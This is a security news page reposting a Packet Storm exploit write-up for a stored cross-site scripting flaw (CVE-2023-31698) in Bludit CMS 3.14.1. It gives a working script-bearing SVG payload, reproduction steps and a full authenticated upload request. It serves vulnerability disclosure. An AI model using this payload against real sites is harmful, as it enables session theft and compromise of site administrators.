Security
Headlines
HeadlinesLatestCVEs

Headline

Bludit CMS 3.14.1 Cross Site Scripting

Bludit CMS version 3.14.1 suffers from a persistent cross site scripting vulnerability.

Packet Storm
Open in Source
#xss#csrf#vulnerability#windows#apache#git#java#php#auth#firefox
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)(Authenticated)# Date: 2023-04-15# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.bludit.com/# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1# Version: 3.14.1# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-31698SVG Payload-------------<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>save this SVG file xss.svgSteps to Reproduce:1. At first login your admin panel.2. then go to setting and click logo section.3. Now upload xss.svg file so your request data will bePOST /bludit/admin/ajax/logo-upload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/112.0Content-Type: multipart/form-data;boundary=---------------------------15560729415644048492005010998Referer: http://127.0.0.1/bludit/admin/settingsCookie: BLUDITREMEMBERUSERNAME=admin;BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74iContent-Length: 651-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="tokenCSRF"626c201693546f472cdfc11bed0938aab8c6e480-----------------------------15560729415644048492005010998Content-Disposition: form-data; name="inputFile"; filename="xss.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.domain);</script></svg>-----------------------------15560729415644048492005010998--4. Now open logo image link that you upload. You will see XSS pop up.

Related news

CVE-2023-31698: Stored XSS via SVG file Vulnerability on Bludit v3.14.1 · Issue #1509 · bludit/bludit

Bludit v3.14.1 is vulnerable to Stored Cross Site Scripting (XSS) via SVG file on site logo.

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3
Packet Storm